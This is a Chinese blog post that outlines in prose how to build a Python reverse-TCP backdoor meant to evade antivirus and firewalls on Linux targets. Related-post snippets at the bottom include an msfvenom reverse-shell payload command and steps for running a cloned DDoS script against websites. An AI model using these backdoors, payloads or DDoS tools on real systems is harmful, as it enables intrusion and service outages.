黑客技术:针对linux系统进行渗透时,使用python生成反向tcp后门_目标靶机开启反向tcp处理程序

于 2024-04-27 21:57:49 发布
阅读量769 收藏 23
点赞数
文章标签: linux tcp/ip 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264536/article/details/138259103
版权

更多Python视频、源码、资料加群683380553免费获取

攻击者的服务端代码

之前已经叙述过,作为攻击者,我们不能直接连接受害服务器,这样可能会触发杀毒软件,或者我们会被禁止连接。但是受害机器连接到服务端,然后再发送指令,这样就可以很大几率绕过防火墙。我们第一步先初始化sockets模块,以及处理反向连接。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

这么多代码看着烦?那我们分解一下吧?

  1. 导入相关数据包

  2. 通过sys.argv模块接收套接字端口信息

  3. 设置套接字,绑定套接字,侦听套接字端口,等待连接

  4. 如果有人访问,脚本会输出一串消息。

  5. 脚本一直处于无限循环当中,等待发送命令,以及接收命令回显。

  6. 如果输入的命令为空,那么继续下一个循环

  7. 如果命令是exit(),发送给客户端,就会同时关闭本地和远程的连接。

  8. 如果上述两种情况都没有的话,脚本就会将输入当成要在受害机器上执行的命令,并且接收返回的结果。

  9. 我们将消息大小和内容分离出来。大小命名为total_size,内容命名为:result。

  10. 如果发现输出的大小和total_size不匹配,那么我们继续运行一个while循环,知道全部接收完为止。

  11. 输出结果,并且去掉最后的换行符

  12. 如果有一个步骤存在错误,那么socket通信就会关闭

这并不难吧,所以我不会一行一行的解释我写的代码,只需要了解下重要的模块就好了,现在我们编写客户端的代码吧~

被攻击端代码

客户端连接到我们的机器并不需要太多代码~

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

我还是将它分解一下讲解吧~

  1. 通过sys.argv模块在命令行接收要连接的对象:ip和端口

  2. 建立套接字对象,连接到指定地址和端口

  3. 如果连接成功,我们就会收到来自服务端的信息

  4. 如果命令不是exit(),则就会通过sp模块执行命令。命令执行的结果会通过sh进行传递。

  5. (out,err)是标准化输出以及标准错误流

  6. 将输出流写入result变量

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84264536
关注
  • 0
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻击机和靶机使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机和靶机使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### ...
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
metasploitable-linux为常用的Linux靶机系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更...
msf的reverse_tcp和bind_tcp两者的区别
HoAd'blog
07-31 5194
msf的reverse_tcp和bind_tcp两者的区别reverse_tcpbind_tcpreverse_httpreverse_https安全性 reverse_tcp 攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这如果在攻击机监听该端口会发现测试机已经连接。 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444 -f elf -o shell bi
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4248
文章作者  zusheng 文章来源  i春秋原创奖励计划 间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
ReverseTcpshell使用教程
m0_53087192的博客
03-11 452
测试环境 攻击机:192.168.50.100 windows10 被攻击:192.168.50.101 windows server 2016 生成payload 使用powershellReverseTCP.ps1运行 设置监听ip,端口 生成两种payload,一种powershell,一种cmd。 复制一个payload,在被攻击机上运行,返回shell。 火绒全程无反应。 ...
黑客技术:针对linux系统进行渗透使用python生成反向tcp后门
python学习者的博客
11-15 977
针对linux系统进行渗透,我们会在相对安全的环境下进行攻击。一般我们会在目标机器上安装一些虚拟化的软件,并且针对系统安装相应的环境。为了渗透成功,我们需要在靶机上种植后门,但是现在大部分杀毒软件都会对MSF产生的后门进行查杀,所以在实战中我们需要避免使用msf这种工具产生后门。这就需要我们自己编写后门程序了,这篇文章就是讲如何编写msf中的其中一个payload:reverse_tcp模块。 ...
Python调用执行Linux系统命令(四种方法)
热门推荐
zsk_john的技术分享专用博客
01-31 4万+
Python调用执行Linux系统命令(四种方法) Python作为一门脚本语言,胶水语言,自然是有它的胶水特性的,就比如PythonLinux系统的结合,比如,在使用Python编写自动化运维脚本的候,总免不了需要和Linux系统交互,如,查询Linux系统内的某个文件,然后修改这个文件并运行它(假设有可运行权限)。 Python让人称道的其中一个地方就是它的类库非常齐全,这是真的不吹牛,只有你想不到,基本没有它没有的库,比如科学计算...
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
一个OA项目,框架SSH 数据库是;mysql 前端是easy UI
2021年山东省职业院校技能大赛网络安全赛项C模块Linux靶机
04-29
你尝试利用各种攻击手段,攻击特定靶机,以便了解最新的攻击手段和技术,了解网络黑客的心态,从而改善您的防御策略。 请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录答题平台。 二、操作系统环境说明...
deeplink-reverse-tcp:使用简单的Metasploit reverse_tcp有效负载,Microsoft Word和SettingContent-ms文件获得反向连接
05-24
反向链接 需要的东西:Microsoft word(最好是较旧的版本),notepad / notepad ++,Kali vm,Windows reverse_tcp负载和Windows机器 创建有效负载+命令和控制服务器设置 在Kali Linux中创建Windows / Meterpreter / reverse_tcp有效负载 启动Apache服务器 将payload.exe推送到var / www / html 在Windows中修改SettingContent-ms文件 打开记事本/记事本++,然后复制粘贴ILoveWindows.SettingContent-ms 用您的kali本地ip和有效负载可执行文件名称替换“ ” 保存 在Microsoft Word中插入SettingContent-ms文件 打开Microsoft Word,然后转到“插入”->“对象”->
Reverse_TCP_Program:用python编写的反向TCP程序
03-22
反向TCP程序 用python编写的反向TCP程序
python安全调用linux命令
weixin_40679698的博客
02-12 302
python安全调用linux命令——subprocess
python检测和防御DOS攻击教程
最新发布
m0_73896875的博客
07-06 647
在windows开发,最后丢到linux中运行,需要安装python3.0+版本在linux中。利用Python编程实现对wrk的泛洪攻击检测,并让程序触发调用Linux命令实现防御:1、泛洪攻击的检测,可以考虑使用的命令,这些命令可以通过Python进行调用和分析。(5)top -n 1获取CPU的使用率(6)uptime 获取CPU的平均负载(7)ss -lnt 显示监听状态下的队列情况:ss -lnt(8)/opt/lampp/logs/access_log Web服务器访问日志。
Kali Linux运行Python脚本进行DDoS攻击
HaKerset的博客
07-12 4758
1.从github中克隆我们所要DDos的文件 下面展示一些 内联代码片。 git clone https://github.com/Ha3MrX/DDos-Attack 2.进入该文件中,然后列出 cd DDos-Attack 然后 ls; 3.执行DDoS脚本 python ddos-attack.py 下面,输入网址或IP地址;Port一般为80;设置完就可以进行攻击; 通过不断发包某网站或者IP地址,一旦超过网站或者IP地址承受数量,就会造成网站的延迟甚至服务器瘫痪,使得用户无法正常使
Python远程控制linux,实现Xshell效果
m0_65544268的博客
05-13 808
ssh是一个协议,OpenSSH是其中一个开源实现,paramiko是Python的一个库,实现了SSHv2协议(底层使用cryptography)。有了Paramiko以后,我们就可以在Python代码中直接使用SSH协议对远程服务器执行操作,而不是通过ssh命令对远程服务器进行操作。
网络安全入门学习第三课
p36273的博客
05-05 961
【代码】网络安全入门学习第三课。
一文吃透Linux提权
weixin_45727359的博客
11-07 2406
来自公众号:FreeBuf作者:dnsill0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件...
Windows常用提权方法 (゚益゚メ) 渗透测试
寻觅的博客
03-15 3964
文章目录提权说明Windows提权类型准备工作提权使用PotatoPotato变种 提权说明 Windows作为一个非常完善和成熟的系统体系,有着十分强大的权限管理体系,一般成熟的项目中,也都会有着比较完善的权限分级体系,我们一般能获取到的权限都是普通用户权限。提权不仅可以利用系统漏洞进行,一些软件程序的缺陷也可以被利用作为提权的一种方式。 权限等级: 普通用户(大部分常规用户) < 管理员(administrator或管理员组其他用户) < 系统管理员,超级管理员(system) window
使用python-socket库实现对靶机系统识别
06-03
使用Python的socket库可以实现对靶机系统识别。具体实现步骤如下: 1. 导入socket库: ```python import socket ``` 2. 创建socket连接: ```python client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ``` 3. 连接目标主机: ```python target_host = "192.168.0.1" target_port = 80 client_socket.connect((target_host, target_port)) ``` 4. 发送HTTP请求: ```python request = "GET / HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n" client_socket.send(request.encode()) ``` 5. 接收响应: ```python response = client_socket.recv(1024) ``` 6. 解析响应,判断目标主机的操作系统: ```python if "Windows" in response: print("Target host is running Windows OS.") elif "Linux" in response: print("Target host is running Linux OS.") else: print("Target host OS cannot be determined.") ``` 上述代码的实现原理是通过HTTP请求头中的User-Agent字段来判断目标主机的操作系统。Windows和Linux的User-Agent字段是不同的,因此可以通过User-Agent字段来判断目标主机的操作系统

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值